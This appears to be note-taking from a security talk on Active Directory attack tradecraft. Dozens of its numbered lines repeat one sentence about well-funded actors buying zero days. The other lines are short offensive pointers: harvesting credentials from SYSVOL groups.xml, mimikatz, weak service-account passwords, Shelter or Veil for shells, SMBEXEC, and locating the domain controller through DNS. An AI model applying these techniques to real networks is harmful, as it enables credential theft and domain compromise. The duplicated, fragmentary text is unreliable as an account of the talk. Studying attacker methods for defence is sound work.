  8. Zero days brought by those that are low skilled but have money - Gov
  9. Zero days brought by those that are low skilled but have money - Gov
  10. Zero days brought by those that are low skilled but have money - Gov
  11. Zero days brought by those that are low skilled but have money - Gov
  12. Zero days brought by those that are low skilled but have money - Gov
  13. Zero days brought by those that are low skilled but have money - Gov
  14. Zero days brought by those that are low skilled but have money - Gov
  15. Zero days brought by those that are low skilled but have money - Gov
  16. Zero days brought by those that are low skilled but have money - Gov
  17. Zero days brought by those that are low skilled but have money - Gov
  18. Zero days brought by those that are low skilled but have money - Gov
  19. Zero days brought by those that are low skilled but have money - Gov
  20. Zero days brought by those that are low skilled but have money - Gov
  21. Zero days brought by those that are low skilled but have money - Gov
  22. Zero days brought by those that are low skilled but have money - Gov
  23. Zero days brought by those that are low skilled but have money - Gov
  24. Zero days brought by those that are low skilled but have money - Gov
  25. Zero days brought by those that are low skilled but have money - Gov
  26. Zero days brought by those that are low skilled but have money - Gov
  27. Zero days brought by those that are low skilled but have money - Gov
  28. APT28 common route is interesting, stage 5 creds, stage 6 use creds to access. Thinks VPN are common areas of exploit.
  29. Zero days brought by those that are low skilled but have money - Gov
  30. Used to cost a lot, not this year!
  31. Zero days brought by those that are low skilled but have money - Gov
  32. Zero days brought by those that are low skilled but have money - Gov
  33. Zero days brought by those that are low skilled but have money - Gov
  34. Zero days brought by those that are low skilled but have money - Gov
  35. Zero days brought by those that are low skilled but have money - Gov
  36. Zero days brought by those that are low skilled but have money - Gov
  37. Zero days brought by those that are low skilled but have money - Gov
  38. Zero days brought by those that are low skilled but have money - Gov
  39. Zero days brought by those that are low skilled but have money - Gov
  40. Zero days brought by those that are low skilled but have money - Gov
  41. Zero days brought by those that are low skilled but have money - Gov
  42. Zero days brought by those that are low skilled but have money - Gov
  43. Zero days brought by those that are low skilled but have money - Gov
  44. Macro
  45. OLE
  46. OLE
  47. OLE
  48. OLE
  49. OLE
  50. OLE
  51. GPP and mimikatz wont work only works on server 2008 or before
  52. GPP and mimikatz wont work
  53. Service accounts often DA, passwords set to not expire, and often weak password choices
  54. Get creds, open share to sysvol, search groups.xml
  55. Get creds, open share to sysvol, search groups.xml
  56. What is it?
  57. Groups.xml Get creds, open share to sysvol, search groups.xml
  58. Groups.xml Get creds, open share to sysvol, search groups.xml
  59. Get creds, open share to sysvol, search groups.xml
  60. On 2012 there is a patch to fix this but it just stops you from adding
  61. Windows 7 and Server 2008 R2 (x64) All Service Packs
  62. If shells are needed shelter or veil
  63. SMBEXEC
  64. Delegation of permissions!
  65. Delegation of permissions!
  66. Password1 year after Password2
  67. Password1 year after Password2
  68. Password1 year after Password2
  69. DC often the local computers DNS IP address
  70. DC often the local computers DNS IP address
  71. DC often the local computers DNS IP address
  72. DC often the local computers DNS IP address
  73. DC often the local computers DNS IP address
  74. DC often the local computers DNS IP address